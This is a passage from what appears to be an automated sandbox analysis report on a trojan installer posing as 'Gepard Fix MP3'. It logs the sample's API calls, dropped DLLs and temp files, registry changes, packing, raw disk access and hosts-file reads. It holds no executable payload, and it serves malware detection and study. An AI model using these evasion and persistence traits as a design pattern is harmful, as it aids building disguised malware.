        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C3E25D3_2_02C3E25D
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C2F07E3_2_02C2F07E
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C44EF93_2_02C44EF9
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C42E843_2_02C42E84
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C3E6753_2_02C3E675
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C39F543_2_02C39F54
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C454703_2_02C45470
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C3DD693_2_02C3DD69
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C3AD0A3_2_02C3AD0A
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C385123_2_02C38512
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Gepard Fix MP3\is-1P9P2.tmp A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Gepard Fix MP3\is-265R7.tmp 25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00405964 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00408C14 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00406ACC appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00403400 appears 61 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00445DE4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 004078FC appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 004344EC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00403494 appears 82 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00457D58 appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00453330 appears 93 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00457B4C appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 00403684 appears 221 times
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: String function: 004460B4 appears 59 times
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: String function: 02C45400 appears 139 times
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: String function: 02C38BB0 appears 37 times
        Source: eCh9R4T214.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: eCh9R4T214.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: eCh9R4T214.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: eCh9R4T214.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: eCh9R4T214.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-R93BU.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-R93BU.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-R93BU.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-R93BU.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-JJBLM.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-QGCVQ.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-BPSO6.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-LB9DM.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-F27BV.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-EVRO2.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-1P9P2.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-O973I.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-7GMIE.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-2DTNR.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: is-9D3SM.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: eCh9R4T214.exe, 00000000.00000003.2135596677.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs eCh9R4T214.exe
        Source: eCh9R4T214.exe, 00000000.00000003.2135731235.00000000020C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs eCh9R4T214.exe
        Source: eCh9R4T214.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@5/69@2/1
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_02C308D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,3_2_02C308D0
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555D0
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455DF8
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,3_2_0040222B
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0046E38C GetVersion,CoCreateInstance,1_2_0046E38C
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_00402736 StartServiceCtrlDispatcherA,3_2_00402736
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: 3_2_00402736 StartServiceCtrlDispatcherA,3_2_00402736
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3Jump to behavior
        Source: C:\Users\user\Desktop\eCh9R4T214.exeFile created: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\eCh9R4T214.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: eCh9R4T214.exeReversingLabs: Detection: 26%
        Source: eCh9R4T214.exeVirustotal: Detection: 29%
        Source: C:\Users\user\Desktop\eCh9R4T214.exeFile read: C:\Users\user\Desktop\eCh9R4T214.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\eCh9R4T214.exe "C:\Users\user\Desktop\eCh9R4T214.exe"
        Source: C:\Users\user\Desktop\eCh9R4T214.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp "C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp" /SL5="$103F8,4124077,54272,C:\Users\user\Desktop\eCh9R4T214.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess created: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe "C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe" -i
        Source: C:\Users\user\Desktop\eCh9R4T214.exeProcess created: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp "C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp" /SL5="$103F8,4124077,54272,C:\Users\user\Desktop\eCh9R4T214.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpProcess created: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe "C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exe" -iJump to behavior
        Source: C:\Users\user\Desktop\eCh9R4T214.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\eCh9R4T214.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: eCh9R4T214.exeStatic file information: File size 4405400 > 1048576

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeUnpacked PE file: 3.2.gepardfixmp3_32.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeUnpacked PE file: 3.2.gepardfixmp3_32.exe.400000.0.unpack
        Source: is-MC0JN.tmp.1.drStatic PE information: 0x8C00008C [Mon Jun 6 07:19:40 2044 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
        Source: is-80S4I.tmp.1.drStatic PE information: section name: /4
        Source: is-9D3SM.tmp.1.drStatic PE information: section name: /4
        Source: is-JJBLM.tmp.1.drStatic PE information: section name: /4
        Source: is-S7VJT.tmp.1.drStatic PE information: section name: /4
        Source: is-M3CH8.tmp.1.drStatic PE information: section name: /4
        Source: is-K0336.tmp.1.drStatic PE information: section name: /4
        Source: is-1P9P2.tmp.1.drStatic PE information: section name: /4
        Source: is-MC0JN.tmp.1.drStatic PE information: section name: /4
        Source: is-265R7.tmp.1.drStatic PE information: section name: /4
        Source: is-F27BV.tmp.1.drStatic PE information: section name: /4
        Source: is-LEQ3C.tmp.1.drStatic PE information: section name: /4
        Source: is-QGCVQ.tmp.1.drStatic PE information: section name: /4
        Source: is-R0PI7.tmp.1.drStatic PE information: section name: /4
        Source: is-O973I.tmp.1.drStatic PE information: section name: /4
        Source: is-EVRO2.tmp.1.drStatic PE information: section name: /4
        Source: is-LB9DM.tmp.1.drStatic PE information: section name: /4
        Source: is-BPSO6.tmp.1.drStatic PE information: section name: /4
        Source: is-UKG3R.tmp.1.drStatic PE information: section name: /4
        Source: is-7GMIE.tmp.1.drStatic PE information: section name: /4
        Source: is-7DR0L.tmp.1.drStatic PE information: section name: /4
        Source: is-5TE1U.tmp.1.drStatic PE information: section name: /4
        Source: is-K35BI.tmp.1.drStatic PE information: section name: /4
        Source: is-N1QBV.tmp.1.drStatic PE information: section name: /4
        Source: is-6TDVA.tmp.1.drStatic PE information: section name: /4
        Source: is-BCCM6.tmp.1.drStatic PE information: section name: /4
        Source: is-2DTNR.tmp.1.drStatic PE information: section name: /4
        Source: is-JUGCD.tmp.1.drStatic PE information: section name: /4
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\eCh9R4T214.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00460088 push ecx; mov dword ptr [esp], ecx1_2_0046008C
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0049467C push ecx; mov dword ptr [esp], ecx1_2_00494681
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004850AC push ecx; mov dword ptr [esp], ecx1_2_004850B1
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00443450 push ecx; mov dword ptr [esp], ecx1_2_00443454
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00459634 push 00459678h; ret 1_2_00459670
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004517E4 push 00451817h; ret 1_2_0045180F
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_004519A8 push ecx; mov dword ptr [esp], eax1_2_004519AD
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00483A08 push 00483AF7h; ret 1_2_00483AEF
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpCode function: 1_2_00477A24 push ecx; mov dword ptr [esp], edx1_2_00477A25

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_00401A4F
        Source: C:\Users\user\AppData\Local\Gepard Fix MP3\gepardfixmp3_32.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02C2F8A7
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-LB9DM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-7GMIE.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-JJBLM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-BCCM6.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Gepard Fix MP3\is-MC0JN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmpFile created: C:\Users\user\AppData\Local\Temp\is-49QMT.tmp\_isetup\_RegDLL.tmpJump to dropped file
